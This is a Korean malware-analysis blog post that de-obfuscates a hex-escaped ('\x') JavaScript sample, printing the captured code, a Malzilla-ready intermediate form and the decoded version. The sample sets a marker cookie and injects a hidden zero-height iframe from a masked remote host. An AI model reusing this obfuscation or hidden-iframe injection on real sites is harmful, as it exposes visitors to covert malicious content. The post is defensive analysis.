
Hexadecimal Obfuscation #02

by hakawati 2013. 6. 19.

개요

두 번째 16진수 난독화 형태는 "\x"를 구분자 기호로 사용하는 유형이다. "\x" 구분자 기호는 자바스크립트 엔진이 16진수 이스케이프를 인식할 때 사용하는 기호다. 이러한 이유로 문자열뿐 아니라 자바스크립트 함수 이름까지도 난독화가 가능하다.

// Obfuscated sample as captured. Every property name and string literal is
// spelled out with "\x" hex escapes (e.g. \x64\x6f\x63\x75\x6d\x65\x6e\x74 is
// "document"), so the script reads as opaque bytes while the JS engine
// resolves the very same identifiers at runtime. The decoded form appears
// further down the page.
// Decoded: if (window["document"]["cookie"]["indexOf"]('nb229=') == -1) {
if (window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"]["\x69\x6e\x64\x65\x78\x4f\x66"]('\x6e\x62\x32\x32\x39\x3d') == -1) {
    // Decoded: var aWdHMqss1 = new window["Date"]();
    var aWdHMqss1 = new window["\x44\x61\x74\x65"]();
    // Decoded: aWdHMqss1.setTime(aWdHMqss1.getTime() + 12h) -- 12 * 60 * 60 * 1000 ms
    aWdHMqss1["\x73\x65\x74\x54\x69\x6d\x65"](aWdHMqss1["\x67\x65\x74\x54\x69\x6d\x65"]() + 12 * 60 * 60 * 1000);
    // Decoded: document.cookie = 'nb229=Yes;path=/;expires=' + <GMT string>
    // The cookie only acts as a "already served" marker for the next 12 hours.
    window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x6f\x6f\x6b\x69\x65"] = '\x6e\x62\x32\x32\x39\x3d\x59\x65\x73\x3b\x70\x61\x74\x68\x3d\x2f\x3b\x65\x78\x70\x69\x72\x65\x73\x3d' + aWdHMqss1["\x74\x6f\x47\x4d\x54\x53\x74\x72\x69\x6e\x67"]();
    // Decoded: document.write("<iframe src='http://<masked host>/js/cookie.html' width='116' height='0' frameborder='0'></iframe>")
    // \x27 is a single quote; the \x2A run is the author's masking of the host.
    // height='0' and frameborder='0' keep the injected frame out of sight.
    window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x69\x66\x72\x61\x6d\x65 \x73\x72\x63\x3d\x27\x68\x74\x74\x70\x3a\x2f\x2f\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2A\x2f\x6a\x73\x2f\x63\x6f\x6f\x6b\x69\x65\x2e\x68\x74\x6d\x6c\x27 \x77\x69\x64\x74\x68\x3d\x27\x31\x31\x36\x27 \x68\x65\x69\x67\x68\x74\x3d\x27\x30\x27 \x66\x72\x61\x6d\x65\x62\x6f\x72\x64\x65\x72\x3d\x27\x30\x27\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e");
}

분석

"%" 형태의 16진수 난독화라면 Malzilla에서 바로 풀리지만, "\x" 난독화는 바로 풀리지 않기 때문에 다음과 같이 "\x"를 "%"로 치환하여 난독화를 해제할 수 있다. 두 표기법 모두 한 바이트를 16진수 두 자리로 표현하므로, 구분자 기호만 바꾸면 Malzilla가 처리하는 "%" 형태가 된다.

// Intermediate form: "\x" replaced by "%" so Malzilla's hex decoder accepts it.
// This is NOT runnable JavaScript -- "%64%6f..." is a literal property name
// here and would never resolve to "document"; it exists only as decoder input.
if (window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"]["%69%6e%64%65%78%4f%66"]('%6e%62%32%32%39%3d') == -1) {
    var aWdHMqss1 = new window["%44%61%74%65"]();
    aWdHMqss1["%73%65%74%54%69%6d%65"](aWdHMqss1["%67%65%74%54%69%6d%65"]() + 12 * 60 * 60 * 1000);
    window["%64%6f%63%75%6d%65%6e%74"]["%63%6f%6f%6b%69%65"] = '%6e%62%32%32%39%3d%59%65%73%3b%70%61%74%68%3d%2f%3b%65%78%70%69%72%65%73%3d' + aWdHMqss1["%74%6f%47%4d%54%53%74%72%69%6e%67"]();
    // %27 decodes to a single quote, %2A to '*' (the author's masking of the host).
    window["%64%6f%63%75%6d%65%6e%74"]["%77%72%69%74%65"]("%3c%69%66%72%61%6d%65 %73%72%63%3d%27%68%74%74%70%3a%2f%2f%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2A%2f%6a%73%2f%63%6f%6f%6b%69%65%2e%68%74%6d%6c%27 %77%69%64%74%68%3d%27%31%31%36%27 %68%65%69%67%68%74%3d%27%30%27 %66%72%61%6d%65%62%6f%72%64%65%72%3d%27%30%27%3e%3c%2f%69%66%72%61%6d%65%3e");
}
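// Fully decoded sample. The logic is a once-per-12-hours marker check:
// if the 'nb229=' cookie is absent, set it and inject a hidden iframe.
//
// Transcription fix: in the captured sample the iframe attributes were
// quoted with \x27, i.e. single quotes. Writing them as double quotes
// inside a double-quoted string literal (as the earlier transcription did)
// terminates the literal early and is a syntax error, so the decoded
// listing would not even parse. Single quotes restore the original bytes.
if (window["document"]["cookie"]["indexOf"]('nb229=') == -1) {
    var aWdHMqss1 = new window["Date"]();
    // 12 * 60 * 60 * 1000 ms = 12 hours; the marker cookie expires after that,
    // so the injection repeats at most once per 12 hours per browser.
    aWdHMqss1["setTime"](aWdHMqss1["getTime"]() + 12 * 60 * 60 * 1000);
    window["document"]["cookie"] = 'nb229=Yes;path=/;expires=' + aWdHMqss1["toGMTString"]();
    // Zero-height, borderless iframe: loads the remote page without any visible
    // change. A document.write() of an iframe with height='0' paired with a
    // marker cookie is a useful detection signature for this family.
    window["document"]["write"]("<iframe src='http://****************/js/cookie.html' width='116' height='0' frameborder='0'></iframe>");
}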

